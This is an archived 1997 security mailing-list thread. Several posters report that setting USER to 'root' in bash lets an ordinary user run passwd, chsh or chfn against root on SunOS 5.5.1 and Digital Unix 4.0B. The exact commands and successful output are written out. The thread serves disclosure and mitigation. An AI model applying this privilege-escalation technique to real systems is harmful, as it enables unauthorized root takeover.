Re: SunOS exploit. & DigitalUnix

[mmokrejs () PRFDEC NATUR CUNI CZ (Martin Mokrejs)]

This also works on Digital Unix 4.0B :-(

login as generic user, than run bash,

bash-2.00$ export USER="root"
bash-2.00$ passwd root
Last successful password change for root: Sun May  4 16:49:07 1997
Last unsuccessful password change for root: NEVER

New password:
Re-enter new password:
bash-2.00$

I succesfully modified root's password :-( Even we have C2 security
installed:-(

I suggest - disable bash !!!

Martin Mokrejs
mmokrejs () natur cuni cz

On Mon, 19 May 1997, Trevor Linton wrote:

> This worked on SunOS 5.5.1 Generic_103640-05 sun4m sparc.
>
> Please mind you that this only works on versions of programs
> that use getenv("USER"); to obtain the username, i'm also aware
> anyone who uses elm on ANY system, linux, bsd, SunOS included
> can read any users mail :P. getenv("USER") on programs that are
> reliant on the USERNAME isn't safe especially when there +s'ed.
>
> blind - blind () root hax0r org support () hax0r org
> Swingin' Utters. a juvenile product of the working class.
>
> "People who are having trouble communicating should just shuttup"
>
>
> On Mon, 19 May 1997, Jeff Uphoff wrote:
>
> > "TL" == Trevor Linton <blind () SEDATED NET> writes:
> >
> > TL> On sunos, if you execute a clean bash shell then type, export USER="root"
> > TL> then USER=$LOGNAME, then execute chsh root or chfn root you can change
> > TL> the root information.
> >
> > TL>  On the SunOS system i have [...]
> >
> > What version(s) of SunOS?
> >
> > I just tried this on an old 4.1.2 system I have and I could not
> > duplicate it.
> >
> > --Up.
> >
> > --
> > Jeff Uphoff - Scientific Programming Analyst  |  juphoff () nrao edu
> > National Radio Astronomy Observatory          |  juphoff () bofh org uk
> > Charlottesville, VA, USA                      |  jeff.uphoff () linux org
> >         PGP key available at: http://www.cv.nrao.edu/~juphoff/